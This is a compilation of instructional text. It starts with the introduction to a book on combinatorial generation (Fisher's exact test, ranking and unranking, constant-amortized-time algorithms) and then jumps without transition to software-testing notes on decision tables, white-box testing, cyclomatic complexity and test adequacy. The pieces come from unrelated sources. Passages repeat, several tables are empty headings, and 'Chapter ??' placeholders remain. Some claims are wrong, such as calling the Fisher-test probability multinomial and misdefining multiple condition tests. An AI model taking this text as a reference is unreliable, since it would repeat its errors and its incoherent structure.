“Let’s look at all the possibilities.” This phrase sums up the outlook of this book. In computer science, mathematics, and in other fields it is often necessary to examine all of a finite number of possibilities in order to solve a problem or gain insight into the solution of a problem. These possibilities often have an underlying combinatorial structure which can be exploited in order to obtain an efficient algorithm for generating some appropriate representation of them.

1.1 Some Examples

1.1.1 Fisher’s Exact Test

Sir R.A. Fisher described an experiment to test a woman who claimed that she could distinguish whether the milk or tea was poured first in a cup of tea and milk. Eight cups of tea were prepared, 4 in which milk came before tea and 4 with tea before milk. The woman knows that there will be 4 of each type. The results were as shown below in what’s called a 2 by 2 contingency table.

                       Guess
Poured First       Milk    Tea
Milk                 3       1      4
Tea                  1       3      4

The probability that a particular contingency table T occurs follows a multinomial distribution, where x1 and x2 are the entries in the first column, n1 and n2 are the row totals, and N = n1 + n2.

Prob(T) = \binom{n_1}{x_1} \binom{n_2}{x_2} \Big/ \binom{N}{x_1 + x_2}

The typical questions that a statistician wishes to answer are: (1) How many tables have a lower probability of occurring than the observed table? (2) What is the sum of probabilities of tables having a value of x1 at least as large as what’s observed?

In our example, the value of \binom{N}{x_1 + x_2} = \binom{8}{4} is 70, and the possible probabilities are given in the table below.


x1   x2   numerator                          probability
0    4    \binom{4}{0}\binom{4}{4} = 1       1/70 = 0.0142857
1    3    \binom{4}{1}\binom{4}{3} = 16      16/70 = 0.2285714
2    2    \binom{4}{2}\binom{4}{2} = 36      36/70 = 0.5142857
3    1    \binom{4}{3}\binom{4}{1} = 16      16/70 = 0.2285714
4    0    \binom{4}{4}\binom{4}{0} = 1       1/70 = 0.0142857

Answering each of these questions involves the generation of combinatorial objects. In this case the generation is particularly simple. We wish to compute the value of Prob(T) for all those values of x1 and x2 for which x1 + x2 = 4, with the additional constraints that x1 ≤ n1 = 4 and x2 ≤ n2 = 4. The combinatorial objects being generated are the pairs (x1, x2).

In the more general setting of a k by 2 contingency table, we need to generate all solutions to

x_1 + x_2 + \cdots + x_k = r_1 \quad \text{subject to} \quad 0 \le x_i \le n_i.

Algorithms for generating these objects, which we call combinations of a multiset, are presented in Section 4.5.1.
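The probabilities tabulated above can be reproduced with a few lines of Python. This sketch simply enumerates the pairs (x1, x2) with x1 + x2 = 4 and applies the formula, using math.comb for the binomial coefficients.

# Reproduce the Fisher's-test probabilities for the 2 by 2 table with n1 = n2 = 4.
from math import comb

n1, n2, r = 4, 4, 4
N = n1 + n2
denom = comb(N, r)                # C(8, 4) = 70
for x1 in range(r + 1):
    x2 = r - x1
    if x1 <= n1 and x2 <= n2:
        num = comb(n1, x1) * comb(n2, x2)
        print(x1, x2, num, round(num / denom, 7))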

1.1.2 A Second Example

This subsection is yet to be written.

1.2 Elementary Objects

There is no precise definition of an elementary combinatorial object. Our intuitive notion is that if a class of combinatorial objects satisfies a simple recurrence relation then it is elementary. We make no attempt to define “simple recurrence relation.” However, we consider permutations, combinations, set partitions, numerical partitions, binary trees and labeled graphs to all be elementary combinatorial objects; while unlabeled graphs, room squares, and unlabeled partially ordered sets are not elementary.

Many recurrence relations may be stated in a form that involves no division or subtraction, only multiplication and addition, and further that involves only positive values, even in the base cases. Such recurrence relations are said to be positive. Given a simple recurrence relation describing an elementary combinatorial object, it is typically straightforward to develop an algorithm for generating a natural representation of that object. If the recurrence relation is positive, then the algorithm is often efficient in an amortized sense. This point of view was perhaps first explored by Wilf in two papers [448], [449], and we have more to say on this subject in Section 4.9.

Most of the book is devoted to elementary objects, namely Chapters 4, 5, and 6. Non-elementary objects are generated in Chapters 3 and 8.

1.3 Four Basic Questions

We consider in this book 4 basic questions: listing, ranking, unranking, and random selection, of which the listing question is of paramount importance.

[listing] Algorithms for generating combinatorial objects come in two varieties. Either there is a recursive procedure, call it GenerateAll, that typically has the same recursive structure as a recurrence relation counting the objects being generated, or there is a procedure, call it Next, that takes the current object, plus possibly some auxiliary information, and produces the next object. Typically, but not always, Next is iterative. Throughout the book we assume that Next is used by a section of code as shown below.

Initialize;  { includes done := false }
repeat
    PrintIt;
    Next;
until done;

The boolean variable done is global and is eventually set true by Next. If Next contains no loop then the generation algorithm is said to be loopless. Another term one sometimes sees in connection with iterative generation algorithms is memoryless. This simply means that Next contains no global variables whose value changes; the algorithm can be started with any object.
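As a concrete instance of the repeat/until skeleton above (in Python, under our own naming, rather than the book's pseudo-code), the following routine steps through all binary strings of length n in lexicographic order; done is set once the last string has been produced.

# Iterative Next over binary strings of length n, in lexicographic order.
n = 3
a = [0] * n        # Initialize
done = False

def next_string():
    global done
    # Add 1 in binary: flip trailing 1s to 0, then the first 0 to 1.
    i = n - 1
    while i >= 0 and a[i] == 1:
        a[i] = 0
        i -= 1
    if i < 0:
        done = True  # the largest string 11...1 was just printed
    else:
        a[i] = 1

while not done:
    print(a)         # PrintIt
    next_string()    # Next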

Many older papers start with a nice recursive decomposition of the class of objects to be generated and then jump immediately into the development of an iterative Next routine. This unfortunate habit has turned many a beautiful decomposition into an ugly program. One would sometimes see this uglification justified by a sentence stating that recursion was slow because of the overhead involved in making procedure calls and passing parameters.¹ This justification can no longer be accepted! It’s a throwback to a by-gone era. Most modern machines include hardware to speed procedure calls. The Sun workstation sitting on the author’s desk has banks of “window” registers that make recursive programs written in C faster than their iterative counterparts! For these reasons, the vast majority of generation algorithms presented in this book are recursive.

However, there are at least two compelling reasons why iterative Next routines are useful — these reasons are due to more modern trends in computing. First is the cause of modularization. Iterative and recursive generation procedures present two opposite views to the user. Iteration says “Give me an object and I’ll give you the next one”. Recursion says “Give me the procedure that uses the object and I’ll apply it to every object”. The second reason is that iterative procedures are often more amenable to parallel computation.

Sometimes it is desirable to have a listing of objects in which successive objects are “close” in some well-defined sense. Such listings are called Gray Codes, and are the subjects of Chapter 5 and Chapter 6.

[ranking] Relative to an ordering of a set of combinatorial objects, such as the ordering imposed by a generation algorithm, the rank of an object is the position that the object occupies in the ordering. Our counting begins at 0, so another way of defining the rank is as the number of objects that precede it in the list.² One of the primary uses of ranking algorithms is that they provide “perfect hashing functions” for a class of combinatorial objects. The existence of a ranking algorithm allows you to set up an array indexed by the objects. Ranking (and unranking) is generally only possible for some of the elementary combinatorial objects.

[unranking] Unranking is the inverse process of ranking. To unrank an integer r is to produce the object that has rank r. Unranking algorithms can be used to implement parallel algorithms for generating combinatorial objects, when used in conjunction with a Next procedure. For more on this see Chapter ??. For this reason we try to ensure that our unranking algorithms return enough information for Next to be restarted from any object.

¹ Or perhaps that the language being used didn’t support recursion.
² In the literature many ranking algorithms begin counting at 1.

[random selection] Here we want to produce a combinatorial object uniformly at random. An unranking algorithm can be used, but often more direct and efficient methods can be developed. This is an important topic, and is treated in Chapter 10, but is not a main focus of this book.
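To illustrate ranking and unranking (counting from 0, as above), here is a sketch for k-element subsets of {0, ..., n-1} in lexicographic order. This is one standard scheme chosen for illustration, not necessarily the one used in the book.

# Rank/unrank k-subsets of {0, ..., n-1} in lexicographic order, ranks starting at 0.
from math import comb

def rank(T, n):
    # T is a sorted k-subset; count the subsets that precede it.
    k, r, prev = len(T), 0, -1
    for i, t in enumerate(T):
        for c in range(prev + 1, t):
            r += comb(n - c - 1, k - i - 1)  # subsets containing the skipped element c here
        prev = t
    return r

def unrank(r, n, k):
    T, c = [], 0
    while k > 0:
        count = comb(n - c - 1, k - 1)  # subsets whose smallest remaining element is c
        if r < count:
            T.append(c)
            k -= 1
        else:
            r -= count
        c += 1
    return T

print(rank([1, 3], 4))   # lexicographic order 01,02,03,12,13,23 gives rank 4
print(unrank(4, 4, 2))   # [1, 3]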

1.4 A Word about the Algorithms

It is hoped that the contents of this book are not only interesting but also useful. The algorithms in this book have been presented in a pseudo-code. In most cases it should be a trivial exercise to translate these algorithms into languages such as C, C++, Java, or Pascal. The most important difference in our pseudo-code from those languages is that the scope of statements is indicated by indentation, rather than by the use of parentheses, as in C, C++, and Java, or by the use of begin/end pairs, as in Pascal. In spirit our algorithms are closest to Pascal. Procedures that do not return a value are indicated by the reserved word procedure (these are like void procedures and methods in C and Java). Those that return a value are indicated by the reserved word function. The return type of the function is indicated after the parameter list, as in

function ( 〈 parameter list 〉 ) : 〈 return type 〉;

Following Knuth, we use x :=: y to indicate the swap of the values of two variables; i.e., it is shorthand for t := x; x := y; y := t. Also, we allow for multiple (parallel) assignment statements such as [x, y] := [e, f] to indicate the assignments x := e and y := f, executed in parallel. The notations ai and a[i] will be used interchangeably, and a[i..j] indicates the subarray of a indexed from i to j. Arrays can be declared over an arbitrary range; i.e., not necessarily starting from 0, as in C and Java.

Linked structures are not often used in this book, but when they are we adopt simple “dot” notation to denote fields within nodes.

1.5 The Representation Issue

There are typically many ways to represent a combinatorial object, and these different representations may lead to wildly differing algorithms for generating the objects. For example, permutations may be represented in one-line notation, in cycle notation, by inversion tables, or even by permutation matrices; binary trees may be represented as a linked data structure, as well-formed parentheses strings, as triangulations of convex polygons, or as ordered trees, as well as many other sequence representations. Which representation is most useful usually depends upon the application that requires the objects to be generated. This is a matter over which the author of the book has no control.

On the other hand, each object usually has some small number of standard representations, and it is these representations that we try to generate, and that other developers of generation algorithms should try to generate. These standard representations we use are almost always sequences, usually of fixed length, but not always.

The user of an algorithm for generating combinatorial objects should specify the representation most useful to them. Assume that we wish to generate some combinatorial family Sn indexed by numbers n, and where sn = |Sn| is known or easily computable. Left up to the lazy generator, you might get an algorithm like the following.

"Compute sn";
for i := 1 to sn do Output( i );

Typically the computation of sn is efficient as a function of sn, so that the above algorithm is very efficient in an amortized sense. But have we generated Sn? No reasonable person would think so, since all we are doing is counting, and to get a useful representation, some unranking algorithm still has to be developed.

The point of this discussion is that representations are important and the generator (the person developing a generation algorithm) should be careful to use a representation that is useful to others, and not just convenient because it makes the algorithm simple or efficient.

1.6 Complexity Measures

Not much attention has been paid to the model of computation in the area of combinatorial generation. For the most part authors use the random access machine model. This is more or less like counting operations in a Pascal program, with the understanding that integers can be arbitrarily large and the assumption that standard arithmetic operations can be done in constant time. For large integers this is an unrealistic assumption. It is generally the case that integers are small in generation algorithms, but that they are large in ranking and unranking algorithms. We will therefore measure ranking and unranking algorithms in terms of the number of arithmetic operations used.

The complexity of generating combinatorial objects is not well addressed by the classical theory of computational complexity, with its emphasis on the polynomial versus non-polynomial time question, and polynomial and log-space reductions. Most classes of combinatorial objects with which we are concerned have at least exponentially many elements, and useful reductions of any kind are rare. Some complexity questions are addressed in Chapter ??.

An enormous amount of research has gone into getting away from the “brute-force” approach to solving discrete optimization problems, and very fruitful approaches to solving a wide variety of these problems have been developed. Nevertheless, one is occasionally forced into the approach of examining all the possibilities, and the results of this book should be useful in those instances. Because of the aversion to the brute-force approach, research in combinatorial generation has never been popular; refining a generation algorithm to more efficiently solve some discrete optimization problem is like an admission of defeat in this view. Combinatorial generation is really a part of theoretical computer science, certainly more so than the complexity of counting, which is now a well-established part of theoretical computer science. Perhaps surprisingly, in the 500+ references in the fairly comprehensive bibliography, there is almost a total absence of references from the preeminent STOC and FOCS conferences. Perhaps this will change; I hope so.

1.7 Analyzing the Algorithms

There are two terms that are used throughout the book. We strive to develop algorithms that have these properties.


CAT Algorithms The holy grail of generating combinatorial objects is to find an algorithm that runs in Constant Amortized Time. This means that the amount of computation, after a small amount of preprocessing, is proportional to the number of objects that are listed. We do not count the time to actually output or process the objects; we are only concerned with the amount of data structure change that occurs as the objects are being generated.

BEST Algorithms This means Backtracking Ensuring Success at Terminals. In other words, the algorithm is of the backtracking type, but every leaf of the backtracking tree is an object of the desired type; it is a “success”.

Suppose that the input to our generation algorithm is n, and that this will produce N objects, each of “size” n. A CAT algorithm has running time O(N). In the typical application of combinatorial generation, each object, as it is produced, is processed somehow. If this processing takes time O(n), then having a CAT algorithm has no advantage over having one with running time O(nN), since the total running time is O(nN) in either case.

There are many papers about generating combinatorial objects that describe an O(nN) running time as “optimal”, because this is the amount of output produced by the algorithm — each object has size n and there are N objects in total. This is a misguided notion that has its roots in the way lower bounds are discussed in the traditional introduction to complexity theory course. There the “trivial lower bound” says that the amount of output gives a lower bound on the amount of computation — of course it says the same thing in our setting, but the amount of output is the wrong thing to measure.

Don’t Count the Output Principle: In combinatorial generation it is the amount of data structure change that should be measured in determining the complexity of an algorithm; the time required to output each object should be ignored.

The “trivial lower bound” for combinatorial generation is Θ(N); it is independent of n. This may seem suspicious, since it appears to take no account of the time that is frequently necessary to initialize the various data structures that are used, but there are many algorithms that require only a constant amount of initialization — we will encounter some, for example, in Chapter 4 on lexicographic generation. Now back to our typical application, where processing each object took time O(n) even though our generation algorithm was CAT. Wouldn’t it be nice if the O(nN) could be brought down to O(N)? This is frequently possible! If you go back and observe how successive objects are processed, it is often the case that the amount of processing required is proportional to the amount of change that successive objects undergo.


Decision tables

What is a Decision Table

It is a table that shows different combinations of inputs with their associated outputs; it is also known as a cause-effect table.

In equivalence partitioning (EP) and boundary value analysis (BVA) we have seen that those techniques can be applied only to specific conditions or inputs. However, we may have different inputs that result in different actions being taken; in other words, we may have a business rule to test where different combinations of inputs result in different actions.

For testing such rules or logic, decision table testing is used.

It is a black box test design technique.

It is divided into four quadrants:

Conditions (inputs)      Condition alternatives/combinations
Actions (outputs)        Action entries

Each decision corresponds to a variable, relation or predicate whose possible values are listed among the condition alternatives. Each action is a procedure or operation to perform, and the entries specify whether (or in what order) the action is to be performed for the set of condition alternatives the entry corresponds to. Many decision tables include in their condition alternatives the don't care symbol, a hyphen. Using don't cares can simplify decision tables, especially when a given condition has little influence on the actions to be performed. In some cases, entire conditions thought to be important initially are found to be irrelevant when none of the conditions influence which actions are performed.

INFORMATION:


Decision Table A decision table is a tabular form that presents a set of conditions and their corresponding actions.

Condition Stubs Condition stubs describe the conditions or factors that will affect the decision or policy. They are listed in the upper section of the decision table.

Action Stubs Action stubs describe, in the form of statements, the possible policy actions or decisions. They are listed in the lower section of the decision table.

Rules Rules describe which actions are to be taken under a specific combination of conditions. They are specified by first inserting different combinations of condition attribute values and then putting X's in the appropriate columns of the action section of the table.

The techniques of equivalence partitioning and boundary value analysis are often applied to specific situations or inputs. However, if different combinations of inputs result in different actions being taken, this can be more difficult to show using equivalence partitioning and boundary value analysis, which tend to be more focused on the user interface. The other two specification-based software testing techniques, decision tables and state transition testing are more focused on business logic or business rules.


A decision table is a good way to deal with combinations of things (e.g. inputs). This technique is sometimes also referred to as a ’cause-effect’ table. The reason for this is that there is an associated logic diagramming technique called ’cause-effect graphing’ which was sometimes used to help derive the decision table (Myers describes this as a combinatorial logic network [Myers, 1979]). However, most people find it more useful just to use the table described in [Copeland, 2003].

• Decision tables provide a systematic way of stating complex business rules, which is useful for developers as well as for testers.

• Decision tables can be used in test design whether or not they are used in specifications, as they help testers explore the effects of combinations of different inputs and other software states that must correctly implement business rules.

• It helps the developers to do a better job, which can also lead to better relationships with them. Testing combinations can be a challenge, as the number of combinations can often be huge. Testing all combinations may be impractical if not impossible. We have to be satisfied with testing just a small subset of combinations, but making the choice of which combinations to test and which to leave out is also important. If you do not have a systematic way of selecting combinations, an arbitrary subset will be used and this may well result in an ineffective test effort.


Credit card example: Let’s take another example. Suppose you want to open a credit card account. There are three conditions: first, if you are a new customer, you get a 15% discount on all your purchases today; second, if you are an existing customer and you hold a loyalty card, you get a 10% discount; third, if you have a coupon, you can get 20% off today (but it can’t be used with the ‘new customer’ discount). Discount amounts are added, if applicable. This is shown in Table 4.8.

TABLE 4.8 Decision table for credit card example

Conditions            Rule 1  Rule 2  Rule 3  Rule 4  Rule 5  Rule 6  Rule 7  Rule 8
New customer (15%)      Y       Y       Y       Y       N       N       N       N
Loyalty card (10%)      Y       Y       N       N       Y       Y       N       N
Coupon (20%)            Y       N       Y       N       Y       N       Y       N
Actions
Discount (%)            X       X       20      15      30      10      20      0

In Table 4.8, the conditions and actions are listed in the left hand column. All the other columns in the decision table each represent a separate rule, one for each combination of conditions. We may choose to test each rule/combination and if there are only a few this will usually be the case. However, if the number of rules/combinations is large we are more likely to sample them by selecting a rich subset for testing.

In decision table based testing, the steps we follow include:

• Develop the decision table
• Design the test cases

Now let’s see the decision table for credit card shown above:

• Note that we have put X for the discount for two of the columns (Rules 1 and 2) – this means that this combination should not occur. You cannot be both a new customer and also hold a loyalty card, as per the conditions mentioned above. Hence there should be an error message stating this.

• We have made an assumption in Rule 3. Since the coupon has a greater discount than the new customer discount, we assume that the customer will choose 20% rather than 15%. We cannot add them, since the coupon cannot be used with the ‘new customer’ discount as stated in the condition above. The 20% action is an assumption on our part, and we should check that this assumption (and any other assumptions that we make) is correct, by asking the person who wrote the specification or the users.

• For Rule 5, however, we can add the discounts; since both the coupon and the loyalty card discount should apply (that’s our assumption).

• Rules 4, 6 and 7 have only one type of discount and Rule 8 has no discount, so 0%.
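The rules above can be captured directly in code and used to derive the expected outcome for each test case. This Python sketch encodes our reading of Table 4.8, including the assumptions noted for Rules 3 and 5, so the expected values should be checked against the specification just as the assumptions were.

# Expected outcome for each combination of the three conditions (our reading of Table 4.8).
from itertools import product

def expected_discount(new_customer, loyalty_card, coupon):
    if new_customer and loyalty_card:
        return "error"                # Rules 1 and 2: impossible combination
    if new_customer:
        return 20 if coupon else 15   # Rule 3 (assumed: coupon wins) and Rule 4
    if loyalty_card:
        return 30 if coupon else 10   # Rule 5 (assumed: discounts add) and Rule 6
    return 20 if coupon else 0        # Rules 7 and 8

for rule, (nc, lc, cp) in enumerate(product([True, False], repeat=3), start=1):
    print(f"Rule {rule}: new={nc}, loyalty={lc}, coupon={cp} -> {expected_discount(nc, lc, cp)}")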


A decision table is a good way to deal with different combinations of inputs and their associated outputs, and is also called a cause-effect table. The reason for calling it a cause-effect table is an associated logical diagramming technique called ’cause-effect graphing’ that is basically used to derive the decision table.

Decision table testing is a black box test design technique used to determine test scenarios for complex business logic.

We can apply equivalence partitioning and boundary value analysis techniques only to specific conditions or inputs. However, if we have dissimilar inputs that result in different actions being taken, or a business rule to test where different combinations of inputs result in different actions, we use a decision table to test these kinds of rules or logic.

Why Decision table is important?

Decision tables are very helpful in test design: they help testers to explore the effects of combinations of different inputs and other software states that must correctly implement business rules. They also provide a regular way of stating complex business rules, which is helpful for developers as well as for testers. Testing combinations can be a challenge, as the number of combinations can often be huge, and testing all combinations might be unrealistic or unfeasible. We have to be content with testing just a small subset of combinations, but choosing which combinations to test and which to leave out is also significant. If you do not have an efficient way of selecting combinations, an arbitrary subset will be used, and this may well result in an ineffective test effort.

A decision table is an outstanding technique used in both testing and requirements management. It is a structured exercise to prepare requirements when dealing with complex business rules, and it is also used to model complicated logic.


Way to use decision tables in test designing

First, identify a suitable function or subsystem that acts according to a combination of inputs or events. The chosen system should have few inputs; otherwise, the number of combinations becomes unmanageable. If there are many conditions, it is better to split them into subsets and use these subsets one at a time. After identifying the features that need to be combined, add them to a table showing all combinations of “Yes” and “No” for each of the features.

Let’s take an example of a finance application, where the user chooses how to repay a loan: by monthly repayment or by the term of the loan (in years). If the user chooses both options, the system negotiates between the two. So there are two conditions on the loan amount, shown in the table below.

TABLE 1: Blank decision table


Next, enumerate all of the combinations of “Yes” and “No” (Table 2). With two conditions, each column holds a “Yes” or “No”, and there are four combinations (two to the power of the number of things to be combined). Note that with three things to combine there would be eight combinations, and with four things, 16, etc. Because of this, it is always good to take small sets of combinations at once. To keep track of the combinations, alternate “Yes” and “No” on the bottom row, put two “Yes” and then two “No” on the row above the bottom row, etc., so the top row will have all “Yes” and then all “No” (apply the same principle to all such tables). A short code sketch of this pattern follows Table 2.

TABLE 2: Decision table – Input combination
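The alternating Yes/No pattern described above is exactly what a Cartesian product produces. A short Python sketch, with hypothetical condition names for the loan example:

# Generate all Yes/No combinations for a set of conditions, in the order described above.
from itertools import product

conditions = ["Repayment amount entered", "Term of loan entered"]  # hypothetical names
for combo in product("YN", repeat=len(conditions)):
    print(dict(zip(conditions, combo)))

With two conditions this prints four combinations, the first condition running Y, Y, N, N and the second alternating Y, N, Y, N, matching the layout described above.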

In the next step, identify the exact outcome for each combination (Table 3). In this example, the user can enter one or both of the two fields. Each combination (column) is sometimes referred to as a rule.

TABLE 3: Decision table – Combinations and outcomes


So far we have not considered what happens when the customer enters nothing in either of the two fields. The table has shown a combination that was not given in the specification for this example. This combination should result in an error message, so it is necessary to add another action (Table 4). This shows the strength of this method in finding omissions and ambiguities in specifications.

TABLE 4: Decision table – Additional outcomes


Now consider a variant of the example in which the customer is not allowed to enter both repayment and term. This changes the outcomes of our table: an error message is generated if both are entered (shown in Table 5).

TABLE 5: Decision table – Changed outcomes


The final step of this method is to write test cases to exercise each of the four rules in our table.

Advantage of decision table technique:

1. Any complex business flow can easily be converted into test scenarios and test cases using this technique.

2. Such tables work iteratively: the table created in the first iteration is used as the input table for the next tables. Such iteration is carried out only if the initial table is unsatisfactory.

3. It is simple to understand, and everyone can use this method to design test scenarios and test cases.

4. It provides complete coverage of test cases, which helps to reduce rework on writing test scenarios and test cases.

5. These tables guarantee that we consider every possible combination of condition values. This is known as the “completeness property”.


UNIT IV - STRUCTURAL TESTING

Introduction

What is Structural Testing ?

Structural testing, also known as glass box testing or white box testing, is an approach where the tests are derived from knowledge of the software's structure or internal implementation.

Other names for structural testing include clear box testing, open box testing, logic driven testing, and path driven testing.

Structural Testing Techniques:

• Statement Coverage - This technique is aimed at exercising all programming statements with minimal tests.

• Branch Coverage - This technique runs a series of tests to ensure that all branches are tested at least once.

• Path Coverage - This technique corresponds to testing all possible paths, which means that each statement and branch is covered.


Calculating Structural Testing Effectiveness:

Statement testing = (number of statements exercised / total number of statements) x 100%

Branch testing = (number of decision outcomes tested / total number of decision outcomes) x 100%

Path coverage = (number of paths exercised / total number of paths in the program) x 100%
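These calculations are simple ratios; a quick Python sketch (the counts are made-up values for illustration):

# Coverage percentages from counts (illustrative numbers).
def coverage(exercised, total):
    return 100.0 * exercised / total

print(f"Statement coverage: {coverage(45, 50):.1f}%")  # 90.0%
print(f"Branch coverage:    {coverage(18, 24):.1f}%")  # 75.0%
print(f"Path coverage:      {coverage(6, 12):.1f}%")   # 50.0%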

Advantages of Structural Testing:

• Forces the test developer to reason carefully about the implementation

• Reveals errors in "hidden" code

• Spots dead code or other issues with respect to best programming practices

Disadvantages of Structural Testing:

• Expensive, as one has to spend both time and money to perform white box testing.

• There is every possibility that a few lines of code are missed accidentally.

• In-depth knowledge of the programming language is necessary to perform white box testing.

• The structural testing is the testing of the structure of the system or component.

• Structural testing is often referred to as ‘white box’ or ‘glass box’ or ‘clear-box testing’ because in structural testing we are interested in what is happening ‘inside the system/application’.

• In structural testing the testers are required to have the knowledge of the internal implementations of the code. Here the testers require knowledge of how the software is implemented, how it works.

• During structural testing the tester is concentrating on how the software does it. For example, a structural technique wants to know how loops in the software are working. Different test cases may be derived to exercise the loop once, twice, and many times. This may be done regardless of the functionality of the software.

• Structural testing can be used at all levels of testing. Developers use structural testing in component testing and component integration testing, especially where there is good tool support for code coverage. Structural testing is also used in system and acceptance testing, but the structures are different. For example, the coverage of menu options or major business transactions could be the structural element in system or acceptance testing.

White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) is a method of testing software that tests internal structures or workings of an application, as opposed to its functionality (i.e. black-box testing). In white-box testing an internal perspective of the system, as well as programming skills, are used to design test cases. The tester chooses inputs to exercise paths through the code and determine the appropriate outputs.

Levels

1. Unit testing. White-box testing is done during unit testing to ensure that the code is working as intended, before any integration happens with previously tested code. White-box testing during unit testing catches defects early, before the code is integrated with the rest of the application, and therefore prevents errors later on.

2. Integration testing. White-box tests at this level are written to test the interactions of the interfaces with each other. Unit-level testing made sure that each piece of code was tested and working in an isolated environment; integration examines the correctness of the behavior in an open environment through the use of white-box testing for any interactions of interfaces that are known to the programmer.

3. Regression testing. White-box testing during regression testing is the use of recycled white-box test cases at the unit and integration testing levels.

Basic procedure

White-box testing's basic procedures require a deep understanding of the source code being tested. The programmer must have a deep understanding of the application to know what kinds of test cases to create so that every visible path is exercised for testing. Once the source code is understood, it can be analyzed for test cases to be created. These are the three basic steps that white-box testing takes in order to create test cases:

1. Input involves different types of requirements, functional specifications, detailed designing of documents, proper source code, security specifications. This is the preparation stage of white-box testing to layout all of the basic information.

2. Processing involves performing risk analysis to guide the whole testing process, creating a proper test plan, executing test cases, and communicating results. This is the phase of building test cases to make sure they thoroughly test the application, with the given results recorded accordingly.

3. Output involves preparing final report that encompasses all of the above preparations and results.


Advantages

White-box testing is one of the two biggest testing methodologies used today. It has several major advantages:

1. Knowledge of the source code is beneficial to thorough testing.

2. Optimization of code by revealing hidden errors and being able to remove these possible defects.

3. Gives the programmer introspection because developers carefully describe any new implementation.

4. Provides traceability of tests from the source, allowing future changes to the software to be easily captured in changes to the tests.

5. White box tests are easy to automate. 6. White box testing gives clear, engineering-based rules for when to stop testing.

Disadvantages

Although white-box testing has great advantages, it is not perfect and contains some disadvantages:

1. White-box testing brings complexity to testing because the tester must have knowledge of the program, including being a programmer. White-box testing requires a programmer with a high-level of knowledge due to the complexity of the level of testing that needs to be done.

2. On some occasions, it is not realistic to be able to test every single existing condition of the application and some conditions will be untested.

3. The tests focus on the software as it exists, and missing functionality may not be discovered.

Various types of structural testing are:

1. Stress Testing 2. Execution Testing 3. Operations Testing 4. Recovery Testing 5. Compliance Testing 6. Security Testing

White box testing is a test case design method that uses the control structure of the procedural design to derive the test cases.


Characteristics of White Box Testing

• Guarantees that every independent path within a module has been checked at least once.

• Checks all the logical decisions on both their true and false sides.

• Executes all loops at their boundaries.

• Checks all data structures to ensure their validity.

In short the white box testing makes a detailed internal check of the program.

• Basis Path Testing • Control Structure Testing

Basis Path Testing

Basis path testing is a white box testing technique. It enables us to measure the logical complexity of a procedure and to identify the execution paths to exercise.

Cyclomatic Complexity

Cyclomatic Complexity is a software metric to measure the logical complexity of a program.

Cyclomatic Complexity = E – N + 2

Where E is the Number of Edges and N is the Number of Nodes.


Consider a flow graph containing 11 edges and 9 nodes. Its cyclomatic complexity is given by

C = E - N + 2

= 11 - 9 + 2

= 4
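The same computation can be done in code; the flow graph is represented simply as an edge list. The edge list below is a hypothetical graph with 9 nodes and 11 edges, matching the counts quoted above.

# Cyclomatic complexity V(G) = E - N + 2 for a connected flow graph.
def cyclomatic_complexity(edges, num_nodes):
    return len(edges) - num_nodes + 2

# Hypothetical flow graph: 9 nodes, 11 edges.
edges = [(1, 2), (2, 3), (3, 4), (3, 5), (4, 6), (5, 6),
         (6, 7), (6, 8), (7, 9), (8, 9), (2, 9)]
print(cyclomatic_complexity(edges, 9))  # 4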

Control Structure Testing

Control structure testing is a group of white box testing methods.

• Branch Testing • Condition Testing • Data Flow Testing • Loop Testing

The objective of branch testing is to execute every possible decision branch at least once. The commonly used branching statements are if, for, while, and switch.


Condition testing focuses on testing the logical decisions in the program code. Data flow testing selects test paths according to the locations of definitions and uses of variables. Loop testing is a white box technique that focuses on the validity of loop constructs. Loop constructs are of the following types: simple loops, nested loops, concatenated loops, and unstructured loops.


Techniques of White Box Testing

When it comes to white box testing, the knowledge that the tester possesses about the system is the driving factor; it helps the tester to devise test cases aimed at discovering defects in the internal working of the system.

• Statement Tests: All the statements within the code must have a test case associated with it such that each statement must be executed at least once during the testing cycle.

• Decision Tests: All the decision directions must be executed at least once during the testing life cycle.

• Branch Condition Tests: All the conditions in a specific decision must be tested for proper working at least once.

• Decision/Condition Tests: All the combination of the possible conditions within a specific decision for all the decisions is to be tested.

• Data Flow Tests: This will ensure that all the variables and data that are used within the system are tested by passing the specific variables through each possible calculation.

• Multiple Condition Tests: This will ensure that each point of entry within the code is tested at least once during the testing life cycle.
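A tiny example showing how decision tests and branch condition tests differ; the function and the chosen inputs are our own illustration.

# Hypothetical function with one decision composed of two conditions.
def eligible(age, member):
    if age >= 18 and member:    # a decision made of two conditions
        return True
    return False

# Decision tests: the whole decision evaluates both True and False.
decision_tests = [(20, True), (16, True)]

# Branch condition tests: each individual condition evaluates both True and False.
condition_tests = [(20, True), (16, False)]  # age >= 18: T then F; member: T then F

for t in decision_tests + condition_tests:
    print(t, eligible(*t))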


Test adequacy criteria

A test adequacy criterion is a predicate that defines “what properties of a program must be exercised to constitute a thorough test”, i.e., one whose successful execution implies no errors in the tested program.

• Reliability requirement – “The test criterion always produces consistent test results.” If a program tested successfully on one test set that satisfies the criterion, then the program also tests successfully on all test sets that satisfy the criterion.

• Validity requirement – “The test always produces a meaningful result.” For every error in a program, there exists a test set that satisfies the criterion and is capable of revealing the error.

There is no computable criterion that satisfies the above requirements.

What we would like:

• A real way of measuring effective testing: if the system passes an adequate suite of test cases, then it must be correct (or dependable).

• But that’s impossible! Adequacy of test suites, in the sense above, is provably undecidable.

• So we’ll have to settle for weaker proxies for adequacy: design rules that highlight the inadequacy of test suites.

These are criteria that identify inadequacies in test suites. Examples:

• If the specification describes different treatment in two cases, but the test suite does not check that the two cases are in fact treated differently, we may conclude that the test suite is inadequate to guard against faults in the program logic.

• If no test in the test suite executes a particular program statement, the test suite is inadequate to guard against faults in that statement.


• If a test suite fails to satisfy some criterion, the obligation that has not been satisfied may provide some useful information about improving the test suite.

• If a test suite satisfies all the obligations by all the criteria, we do not know definitively that it is an effective test suite, but we have some evidence of its thoroughness.

Building codes are sets of design rules:

• Maximum span between beams in ceiling, floor, and walls; acceptable materials; wiring insulation; ...

• Minimum standards, subject to the judgment of a building inspector who interprets the code.

• You wouldn’t buy a house just because it’s “up to code”; it could be ugly, badly designed, or inadequate for your needs. But you might avoid a house because it isn’t.

• Building codes are adequacy criteria, like practical test “adequacy” criteria.

An adequacy criterion is a set of test obligations. A test suite satisfies an adequacy criterion if:

• all the tests succeed (pass), and

• every test obligation in the criterion is satisfied by at least one of the test cases in the test suite.

Example: the statement coverage adequacy criterion is satisfied by test suite S for program P if each executable statement in P is executed by at least one test case in S, and the outcome of each test execution was “pass”.
